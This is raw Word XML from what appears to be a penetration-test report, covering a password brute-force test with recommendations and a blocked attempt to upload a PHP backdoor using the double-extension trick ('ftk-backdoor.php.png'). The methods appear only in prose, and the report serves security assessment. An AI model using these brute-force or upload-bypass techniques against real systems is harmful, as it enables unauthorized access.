                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1082040" cy="111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D91A84">
              <v:rect id="Rectangle 242" style="position:absolute;margin-left:13.6pt;margin-top:134.2pt;width:85.2pt;height:8.8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9583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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00912F68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47942DF4" wp14:editId="1AB3B9E4">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6933AD0" w14:textId="77777777" w:rsidR="00614492" w:rsidRDefault="00614492" w:rsidP="00912F68"/>
    <w:p w14:paraId="283B7F2D" w14:textId="77777777" w:rsidR="00E85300" w:rsidRDefault="00E85300">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="237959B6" w14:textId="06719B1E" w:rsidR="00644112" w:rsidRDefault="00912F68" w:rsidP="00BC1E52">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>After getting hold of a</w:t>
      </w:r>
      <w:r w:rsidR="009838DA">
        <w:t>n open source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId160" w:history="1">
        <w:r w:rsidRPr="009838DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>password list</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00DC2B9F">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a brute force attempt will be carried </w:t>
      </w:r>
      <w:r w:rsidR="00FA66BA">
        <w:t xml:space="preserve">out </w:t>
      </w:r>
      <w:r w:rsidR="00D027BB">
        <w:t>until</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a 200</w:t>
      </w:r>
      <w:r w:rsidR="00876EB7">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00DC2B9F">
        <w:t>success</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> request is shown.</w:t>
      </w:r>
      <w:r w:rsidR="0024197D">
        <w:t xml:space="preserve"> If it is not </w:t>
      </w:r>
      <w:r w:rsidR="682CA9BD">
        <w:t>shown</w:t>
      </w:r>
      <w:r w:rsidR="0024197D">
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidR="00D473AB">
        <w:t>user’s password is not in the list</w:t>
      </w:r>
      <w:r w:rsidR="00AB5C50">
        <w:t xml:space="preserve"> and a </w:t>
      </w:r>
      <w:r w:rsidR="00AC6CB5">
        <w:t xml:space="preserve">larger and more </w:t>
      </w:r>
      <w:r w:rsidR="006B0129">
        <w:t>extensive list can be used.</w:t>
      </w:r>
      <w:r w:rsidR="001A76AC">
        <w:t xml:space="preserve"> Status 200 represents that the request was successful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A40D731" w14:textId="77777777" w:rsidR="00644112" w:rsidRDefault="00644112" w:rsidP="00912F68">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4121DD4D" wp14:editId="4B33BB59">
            <wp:extent cx="5724525" cy="3219450"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="18946381" name="Picture 189463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1" name="Picture 18946381" descr="Graphical user interface, text, application, email&#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FB4A056" w14:textId="1BA25E06" w:rsidR="00334746" w:rsidRDefault="00334746">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7F9CA5" w14:textId="26D95FB0" w:rsidR="002C530E" w:rsidRDefault="00912F68" w:rsidP="00912F68">
      <w:r>
        <w:t>In this case</w:t>
      </w:r>
      <w:r w:rsidR="00876EB7">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the password is ‘123’ as can be seen </w:t>
      </w:r>
      <w:r w:rsidR="0014168D">
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the successful request</w:t>
      </w:r>
      <w:r w:rsidR="002C530E">
        <w:t xml:space="preserve"> as shown below.</w:t>
      </w:r>
      <w:r w:rsidR="006C10DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B25927F" w14:textId="0BA7CD67" w:rsidR="00912F68" w:rsidRDefault="00351B89" w:rsidP="00912F68">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0BB7046A" wp14:editId="2CF42492">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>left</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>480060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1808480" cy="116840"/>
                <wp:effectExtent l="0" t="0" r="20320" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="244" name="Rectangle 244"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="180848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80D8FD">
              <v:rect id="Rectangle 244" style="position:absolute;margin-left:0;margin-top:37.8pt;width:142.4pt;height:9.2pt;z-index:25165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5pt" w14:anchorId="5F351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">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002C530E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55868470" wp14:editId="0AF8A901">
            <wp:extent cx="5724525" cy="3219450"/>
            <wp:effectExtent l="0" t="0" r="952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CC6825B" w14:textId="32A179CE" w:rsidR="00ED2171" w:rsidRDefault="00912F68" w:rsidP="00BC1E52">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">In this way, attackers can attempt to login </w:t>
      </w:r>
      <w:r w:rsidR="00FA66BA">
        <w:t>into</w:t>
      </w:r>
      <w:r w:rsidR="3605D3E3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a user in an unauthenticated fashion without locking </w:t>
      </w:r>
      <w:r w:rsidR="00455521">
        <w:t>the account</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0014168D">
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> too many </w:t>
      </w:r>
      <w:r w:rsidR="009A38DC">
        <w:t>logins</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> attempts</w:t>
      </w:r>
      <w:r w:rsidR="0014168D">
        <w:t xml:space="preserve"> as demonstrated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. As a </w:t>
      </w:r>
      <w:r w:rsidR="0014168D">
        <w:t>result,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the user </w:t>
      </w:r>
      <w:r w:rsidR="00032742">
        <w:t xml:space="preserve">credentials can be obtained in a </w:t>
      </w:r>
      <w:r w:rsidR="009A38DC">
        <w:t>trial</w:t>
      </w:r>
      <w:r w:rsidR="00E23906">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="009A38DC">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="00E23906">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="009A38DC">
        <w:t>error fashion</w:t>
      </w:r>
      <w:r w:rsidR="00E0724C">
        <w:t xml:space="preserve"> allowing</w:t>
      </w:r>
      <w:r w:rsidR="00F7376B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0080546D">
        <w:t xml:space="preserve">attackers to </w:t>
      </w:r>
      <w:r w:rsidR="00AD1851">
        <w:t xml:space="preserve">sabotage </w:t>
      </w:r>
      <w:r w:rsidR="00A77174">
        <w:t>organizational management and data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28138179" w14:textId="77777777" w:rsidR="00B13680" w:rsidRDefault="00B13680" w:rsidP="00BC1E52"/>
    <w:p w14:paraId="240B9C3A" w14:textId="2171CE1E" w:rsidR="00170CA0" w:rsidRDefault="00170CA0" w:rsidP="00170CA0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="155" w:name="_Toc93487313"/>
      <w:bookmarkStart w:id="156" w:name="_Toc93502892"/>
      <w:bookmarkStart w:id="157" w:name="_Toc93526928"/>
      <w:bookmarkStart w:id="158" w:name="_Toc94100259"/>
      <w:r w:rsidRPr="00170CA0">
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="155"/>
      <w:bookmarkEnd w:id="156"/>
      <w:bookmarkEnd w:id="157"/>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w14:paraId="66CB65B2" w14:textId="7AB55D34" w:rsidR="00170CA0" w:rsidRDefault="003A2698" w:rsidP="00BC1E52">
      <w:r>
        <w:t xml:space="preserve">A solution to this is to enforce </w:t>
      </w:r>
      <w:r w:rsidR="00E65C9D">
        <w:t>credential management policies properly. An example</w:t>
      </w:r>
      <w:r w:rsidR="00FA66BA">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E65C9D">
        <w:t xml:space="preserve"> in this case</w:t>
      </w:r>
      <w:r w:rsidR="00FA66BA">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E65C9D">
        <w:t xml:space="preserve"> is to </w:t>
      </w:r>
      <w:r w:rsidR="000959A4">
        <w:t xml:space="preserve">place </w:t>
      </w:r>
      <w:r w:rsidR="00E46DB3">
        <w:t xml:space="preserve">a maximum of </w:t>
      </w:r>
      <w:r w:rsidR="00764FA4">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="000959A4">
        <w:t xml:space="preserve"> attempts </w:t>
      </w:r>
      <w:r w:rsidR="00DC2403">
        <w:t xml:space="preserve">for the user to </w:t>
      </w:r>
      <w:r w:rsidR="00FA66BA">
        <w:t>log on</w:t>
      </w:r>
      <w:r w:rsidR="00DC2403">
        <w:t xml:space="preserve"> onto the system </w:t>
      </w:r>
      <w:r w:rsidR="006D428B">
        <w:t xml:space="preserve">before permanently or temporarily </w:t>
      </w:r>
      <w:r w:rsidR="00534E16">
        <w:t>locking the account</w:t>
      </w:r>
      <w:r w:rsidR="00AC1BA3">
        <w:t xml:space="preserve"> regardless of which system was used to </w:t>
      </w:r>
      <w:r w:rsidR="00FA66BA">
        <w:t>log on</w:t>
      </w:r>
      <w:r w:rsidR="00AC1BA3">
        <w:t xml:space="preserve"> to the same user</w:t>
      </w:r>
      <w:r w:rsidR="00124A75">
        <w:t>’s account</w:t>
      </w:r>
      <w:r w:rsidR="00AC1BA3">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DC2403">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E57684">
        <w:t>Another security implementation is to enforce mandatory muti-factor auth</w:t>
      </w:r>
      <w:r w:rsidR="003C782D">
        <w:t>entication utilizing user’s email or text via mobile phone</w:t>
      </w:r>
      <w:r w:rsidR="008E1D0F">
        <w:t xml:space="preserve"> number. </w:t>
      </w:r>
      <w:r w:rsidR="00346DE6">
        <w:t xml:space="preserve">The web application should also enforce strict password requirements </w:t>
      </w:r>
      <w:r w:rsidR="003B3210">
        <w:t>and should be implemented</w:t>
      </w:r>
      <w:r w:rsidR="00CB3821">
        <w:t xml:space="preserve"> on</w:t>
      </w:r>
      <w:r w:rsidR="003B3210">
        <w:t xml:space="preserve"> both </w:t>
      </w:r>
      <w:r w:rsidR="00BB743B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="003B3210">
        <w:t>client-side and the server-side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211A4359" w14:textId="77777777" w:rsidR="00A162D7" w:rsidRPr="00054162" w:rsidRDefault="00A162D7" w:rsidP="00DF1300"/>
    <w:p w14:paraId="2A61659D" w14:textId="77777777" w:rsidR="00B13680" w:rsidRDefault="00B13680">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc93487314"/>
      <w:bookmarkStart w:id="160" w:name="_Toc93502893"/>
      <w:bookmarkStart w:id="161" w:name="_Toc93526929"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6795966A" w14:textId="0F5AD31B" w:rsidR="00321257" w:rsidRDefault="00321257" w:rsidP="00321257">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc94100260"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Unrestricted File Upload</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
      <w:bookmarkEnd w:id="160"/>
      <w:bookmarkEnd w:id="161"/>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w14:paraId="744E5FCD" w14:textId="60F33381" w:rsidR="00D7766D" w:rsidRPr="00D7766D" w:rsidRDefault="00D7766D" w:rsidP="00D7766D">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performed by: </w:t>
      </w:r>
      <w:r w:rsidR="00CF4318">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Yi Qian</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFA0105" w14:textId="56147F72" w:rsidR="00E144CD" w:rsidRPr="00091740" w:rsidRDefault="00E144CD" w:rsidP="00BC1E52">
      <w:r>
        <w:t xml:space="preserve">There is a file upload feature present </w:t>
      </w:r>
      <w:r w:rsidR="00BB743B">
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the user p</w:t>
      </w:r>
      <w:r w:rsidR="00FC431E">
        <w:t xml:space="preserve">rofile editing page. This </w:t>
      </w:r>
      <w:r w:rsidR="00C52F7D">
        <w:t xml:space="preserve">feature can be subjected to </w:t>
      </w:r>
      <w:r w:rsidR="00AE49F7">
        <w:t xml:space="preserve">unrestricted file upload where attackers can upload malicious files onto the web application and gain unauthorized access such as </w:t>
      </w:r>
      <w:r w:rsidR="0054384B">
        <w:t>through web shell or remote code execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0A6400" w14:textId="017B90B7" w:rsidR="009B6B71" w:rsidRDefault="009B6B71" w:rsidP="00BC1E52">
      <w:r>
        <w:t>A PHP file containing</w:t>
      </w:r>
      <w:r w:rsidR="001A3289">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> malicious script</w:t>
      </w:r>
      <w:r w:rsidR="001A3289">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00156A80">
        <w:t>was uploaded into the web application. The malicious script</w:t>
      </w:r>
      <w:r w:rsidR="00D04269">
        <w:t xml:space="preserve"> would </w:t>
      </w:r>
      <w:r w:rsidR="00156A80">
        <w:t>allow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the attacker</w:t>
      </w:r>
      <w:r w:rsidR="00D04269">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003D2B0B">
        <w:t>to launch</w:t>
      </w:r>
      <w:r w:rsidR="00D04269">
        <w:t xml:space="preserve"> a web shell and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> run commands on the web application server to access </w:t>
      </w:r>
      <w:r w:rsidR="00723689">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t>sensitive data stored</w:t>
      </w:r>
      <w:r w:rsidR="00D53141">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0021375A">
        <w:t xml:space="preserve">locally </w:t>
      </w:r>
      <w:r w:rsidR="00D53141">
        <w:t>on the remote server</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F7C4A0" w14:textId="2B5E2865" w:rsidR="004B2243" w:rsidRDefault="007F6963" w:rsidP="000B10A1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007F6963">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5640819C" wp14:editId="28F03995">
            <wp:extent cx="4577286" cy="2361019"/>
            <wp:effectExtent l="0" t="0" r="0" b="127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163"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4588186" cy="2366642"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="22348F09" w14:textId="77777777" w:rsidR="00D13108" w:rsidRDefault="00D13108"/>
    <w:p w14:paraId="721F7046" w14:textId="79C0BC57" w:rsidR="002F0B70" w:rsidRDefault="000E683F" w:rsidP="008314AD">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">However, the file upload was blocked. Some possible </w:t>
      </w:r>
      <w:r w:rsidR="00BB743B">
        <w:t>explanations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> could be because of the web application firewall (WAF), or that only files with extensions such as ‘.jpeg’ and ‘.png’ are accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4179C66D" w14:textId="58D5CBE5" w:rsidR="000E683F" w:rsidRDefault="000E683F" w:rsidP="002060D6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00751952">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CFC05D5" wp14:editId="0F3DFCE7">
            <wp:extent cx="4106173" cy="2088173"/>
            <wp:effectExtent l="0" t="0" r="8890" b="762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156317" cy="2113674"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2760F165" w14:textId="5617A0EB" w:rsidR="00D50AC4" w:rsidRDefault="001A5E9A" w:rsidP="00137FD3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Trying to bypass the restriction by the double extension method, </w:t>
      </w:r>
      <w:r w:rsidR="0063227C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00FF5D89">
        <w:t>malicious</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D50AC4">
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="00D50742">
        <w:t>was renamed</w:t>
      </w:r>
      <w:r w:rsidR="00F1676A">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00D50742">
        <w:t>‘ftk-backdoor.php.</w:t>
      </w:r>
      <w:r w:rsidR="00777A13">
        <w:t>png’</w:t>
      </w:r>
      <w:r w:rsidR="00031B62">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00954556">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00031B62">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00954556">
        <w:t xml:space="preserve">ince the web application </w:t>
      </w:r>
      <w:r w:rsidR="00E7409B">
        <w:t>accepts ‘.png’. extension files</w:t>
      </w:r>
      <w:r w:rsidR="00D16CFF">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00777A13">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D16CFF">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00102779">
        <w:t xml:space="preserve">his might </w:t>
      </w:r>
      <w:r w:rsidR="00367695">
        <w:t>permit</w:t>
      </w:r>
      <w:r w:rsidR="00102779">
        <w:t xml:space="preserve"> the PHP script to be </w:t>
      </w:r>
      <w:r w:rsidR="00315B39">
        <w:t xml:space="preserve">successfully </w:t>
      </w:r>
      <w:r w:rsidR="00102779">
        <w:t>uploaded into the web application</w:t>
      </w:r>
      <w:r w:rsidR="00A2380A">
        <w:t xml:space="preserve"> and allow the malicious script to </w:t>
      </w:r>
      <w:r w:rsidR="00547FEB">
        <w:t>run giving the attacker backdoor access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0626BA11" w14:textId="5EAC84C9" w:rsidR="002E44C2" w:rsidRDefault="0082226E" w:rsidP="00C12F9D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7DA6DE31" wp14:editId="11A53FC0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3007910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1428058</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="615571" cy="131076"/>
                <wp:effectExtent l="19050" t="19050" r="13335" b="21590"/>
                <wp:wrapNone/>
                <wp:docPr id="14" name="Rectangle 14"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="615571" cy="131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EC40BB">
              <v:rect id="Rectangle 14" style="position:absolute;margin-left:236.85pt;margin-top:112.45pt;width:48.4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C9BE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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="0082226E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="486377AF" wp14:editId="2AF3419A">
            <wp:extent cx="5943600" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946388" name="Picture 1894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48000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="0082226E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C818695" w14:textId="77777777" w:rsidR="0094100D" w:rsidRDefault="0094100D" w:rsidP="00137FD3"/>
    <w:p w14:paraId="5E1A1203" w14:textId="02E41486" w:rsidR="005B285F" w:rsidRDefault="005B285F" w:rsidP="00137FD3">
      <w:r>
        <w:t xml:space="preserve">The file upload was </w:t>
      </w:r>
      <w:r w:rsidR="009266B4">
        <w:t xml:space="preserve">still </w:t>
      </w:r>
      <w:r>
        <w:t>blocked by the web application</w:t>
      </w:r>
      <w:r w:rsidR="009B7C08">
        <w:t xml:space="preserve"> firewall</w:t>
      </w:r>
      <w:r w:rsidR="00634720">
        <w:t xml:space="preserve">. This means that the web application checks the file uploaded for any malicious scripts instead </w:t>
      </w:r>
      <w:r w:rsidR="00CA4931">
        <w:t xml:space="preserve">of just the file extension. This </w:t>
      </w:r>
      <w:r w:rsidR="003D2781">
        <w:t>mitigates</w:t>
      </w:r>
      <w:r w:rsidR="00CA4931">
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="003D2781">
        <w:t xml:space="preserve">risk of an </w:t>
      </w:r>
      <w:r w:rsidR="00CA4931">
        <w:t>attacker uploading any malicious scripts hidden within files into the web application server.</w:t>
      </w:r>
      <w:r w:rsidR="008D21F7">
        <w:t xml:space="preserve"> Hence, this </w:t>
      </w:r>
      <w:r w:rsidR="003D2781">
        <w:t>exploitation</w:t>
      </w:r>
      <w:r w:rsidR="008D21F7">
        <w:t xml:space="preserve"> was unsuccessful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB67B3" w14:textId="37FAD3EC" w:rsidR="004618BF" w:rsidRDefault="005B285F" w:rsidP="0094100D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="005B285F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="715D9F33" wp14:editId="70AD6CE5">
            <wp:extent cx="4899423" cy="2489493"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="18946382" name="Picture 189463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2" name="Picture 18946382" descr="Graphical user interface, text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId166"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4912387" cy="2496080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E48565" w14:textId="3E8FE96E" w:rsidR="009220AF" w:rsidRDefault="00541C45" w:rsidP="00137FD3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidR="000DFF81">
        <w:t>snippe</w:t>
      </w:r>
      <w:r w:rsidR="5FA5DAFB">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of the</w:t>
      </w:r>
      <w:r w:rsidR="009220AF">
        <w:t xml:space="preserve"> malicious script which was used in the file upload is shown below. If the script was successfully uploaded into the web applicatio</w:t>
      </w:r>
      <w:r w:rsidR="004618BF">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="009220AF">
        <w:t xml:space="preserve">, it </w:t>
      </w:r>
      <w:r w:rsidR="000826BB">
        <w:t>would</w:t>
      </w:r>
      <w:r w:rsidR="009220AF">
        <w:t xml:space="preserve"> allow the attacker to gain backdoor access </w:t>
      </w:r>
      <w:r w:rsidR="00F41F44">
        <w:t>onto the remote server</w:t>
      </w:r>
      <w:r w:rsidR="000E434F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753EE6F3" w14:textId="092EE4ED" w:rsidR="00541C45" w:rsidRDefault="00541C45" w:rsidP="000B10A1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007E5CFD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67111A42" wp14:editId="45565EA8">
            <wp:extent cx="4888415" cy="3521122"/>
            <wp:effectExtent l="0" t="0" r="7620" b="317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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4915447" cy="3540593"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DE1F12" w14:textId="2CBBEFCA" w:rsidR="009220AF" w:rsidRDefault="009220AF" w:rsidP="009220AF"/>
